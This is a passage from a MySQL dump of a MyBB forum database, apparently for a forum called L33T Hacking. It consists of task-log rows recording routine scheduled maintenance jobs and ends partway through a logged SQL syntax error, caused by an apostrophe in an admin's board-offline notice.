`tid`, `dateline`, `data`) VALUES ('15999', '5', '1352617559', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16000', '9', '1352618055', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16001', '5', '1352618862', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16002', '9', '1352618921', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16003', '3', '1352619012', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16004', '9', '1352619625', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16005', '5', '1352620722', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16006', '9', '1352620741', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16007', '3', '1352620792', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16008', '1', '1352622726', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16009', '7', '1352622757', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16010', '5', '1352622773', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16011', '9', '1352623525', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16012', '3', '1352624574', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16013', '5', '1352624639', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16014', '9', '1352624659', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16015', '1', '1352624682', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16016', '7', '1352624744', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16017', '5', '1352624755', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16018', '9', '1352625066', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16019', '5', '1352626458', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16020', '9', '1352626491', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16021', '3', '1352626527', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16022', '9', '1352633552', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16023', '5', '1352633559', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16024', '3', '1352633572', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16025', '1', '1352633588', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16026', '7', '1352633606', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16027', '9', '1352634220', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16028', '5', '1352634326', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16029', '9', '1352635203', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16030', '3', '1352639828', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16031', '1', '1352639853', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16032', '5', '1352639869', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16033', '7', '1352639869', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16034', '9', '1352641996', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16035', '5', '1352642022', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16036', '3', '1352642066', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16037', '9', '1352642153', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16038', '3', '1352642348', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16039', '1', '1352642857', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16040', '7', '1352642881', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16041', '5', '1352642890', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16042', '9', '1352645308', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16043', '5', '1352645335', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16044', '3', '1352645453', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16045', '9', '1352646423', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16046', '3', '1352646431', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16047', '1', '1352646595', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16048', '7', '1352646597', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16049', '5', '1352646705', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16050', '9', '1352646722', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16051', '5', '1352647853', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16052', '9', '1352647874', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16053', '3', '1352647881', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16054', '9', '1352648518', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16055', '5', '1352648782', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16056', '9', '1352649602', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16057', '3', '1352649914', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16058', '1', '1352649945', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16059', '7', '1352649950', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16060', '5', '1352649956', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16061', '9', '1352650292', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16062', '5', '1352651664', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16063', '9', '1352651917', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16064', '3', '1352652188', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16065', '9', '1352654246', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16066', '5', '1352654477', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16067', '3', '1352654485', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16068', '1', '1352654490', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16069', '7', '1352654497', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16070', '5', '1352654800', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16071', '9', '1352654908', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16072', '3', '1352655017', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16073', '9', '1352656177', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16074', '5', '1352656197', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16075', '9', '1352656932', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16076', '3', '1352656935', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16077', '1', '1352656980', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16078', '7', '1352657008', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16079', '5', '1352657174', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16080', '9', '1352657532', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16081', '5', '1352658916', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16082', '9', '1352658942', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16083', '3', '1352658947', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16084', '9', '1352659811', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16085', '5', '1352660173', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16086', '9', '1352661175', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16087', '3', '1352661205', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16088', '1', '1352661209', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16089', '7', '1352661210', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16090', '5', '1352661217', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16091', '9', '1352661859', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16092', '5', '1352661905', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16093', '9', '1352661907', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16094', '3', '1352662223', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16095', '9', '1352662808', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16096', '5', '1352663794', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16097', '9', '1352663808', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16098', '3', '1352663992', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16099', '1', '1352664019', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16100', '7', '1352664025', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16101', '5', '1352664317', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16102', '9', '1352664679', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16103', '5', '1352665592', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16104', '9', '1352665605', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16105', '3', '1352665819', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16106', '9', '1352676005', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16107', '5', '1352676199', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16108', '3', '1352676329', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16109', '1', '1352676363', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16110', '7', '1352676366', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_datacache, lthackin_joker.mybb_forums, lthackin_joker.mybb_posts, lthackin_joker.mybb_sessions, lthackin_joker.mybb_stats, lthackin_joker.mybb_tasklog, lthackin_joker.mybb_tasks, lthackin_joker.mybb_threads, lthackin_joker.mybb_threadsread, lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history, lthackin_joker.mybb_users table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16111', '5', '1352676557', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16112', '9', '1352676566', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16113', '3', '1352677843', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16114', '9', '1352677989', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16115', '5', '1352678072', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16116', '9', '1352678375', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16117', '3', '1352678648', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16118', '1', '1352678650', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16119', '2', '1352678655', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16120', '7', '1352678727', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16121', '11', '1352678820', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16122', '5', '1352678855', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16123', '9', '1352679157', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16124', '5', '1352680003', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16125', '9', '1352680120', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16126', '3', '1352682732', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16127', '9', '1352683673', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16128', '5', '1352725304', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16129', '1', '1352732462', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16130', '7', '1352732560', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16131', '3', '1352738332', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16132', '9', '1352738338', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16133', '5', '1352754039', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16134', '1', '1352754114', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16135', '7', '1352754131', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16136', '9', '1352756651', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16137', '3', '1352758115', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16138', '5', '1352758738', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16139', '9', '1352760424', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16140', '1', '1352761229', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16141', '7', '1352761267', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16142', '5', '1352761283', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16143', '3', '1352761286', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16144', '9', '1352761416', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16145', '5', '1352761502', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16146', '9', '1352761995', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16147', '5', '1352762708', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16148', '9', '1352762718', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16149', '3', '1352763001', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16150', '9', '1352763704', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16151', '5', '1352764870', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16152', '9', '1352764908', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16153', '3', '1352764987', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16154', '1', '1352765035', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16155', '2', '1352765150', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16156', '7', '1352765165', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16157', '11', '1352765176', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16158', '5', '1352765201', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16159', '9', '1352765410', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16160', '5', '1352766715', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16161', '9', '1352766726', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16162', '3', '1352767172', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16163', '9', '1352767242', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16164', '5', '1352767502', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16165', '9', '1352768419', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16166', '3', '1352768584', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16167', '1', '1352768668', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16168', '7', '1352768738', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16169', '5', '1352768896', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16170', '9', '1352769015', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16171', '5', '1352769915', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16172', '9', '1352769927', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16173', '3', '1352770205', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16174', '9', '1352770814', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16175', '5', '1352771113', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16176', '9', '1352771711', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16177', '3', '1352771946', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16178', '1', '1352772016', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16179', '7', '1352772020', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16180', '5', '1352772305', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16181', '9', '1352772617', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16182', '5', '1352773504', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16183', '9', '1352773516', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16184', '3', '1352773852', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16185', '9', '1352774455', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16186', '5', '1352774706', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16187', '9', '1352775673', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16188', '3', '1352776087', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16189', '1', '1352776267', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16190', '7', '1352778553', 'MyBB SQL Error - [20] array ( \'error_no\' => 1064, \'error\' => \'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \\\'s nothing to worry about just some security patches. - T3h Jok3r\\\' WHERE name=\\\'bo\\\' at line 2\', \'query\' => \' UPDATE mybb_settings SET `value`=\\\'For security reasons L33T Hacking will offline for the next 24 hours. There\\\'s nothing to worry about just some security patches. - T3h 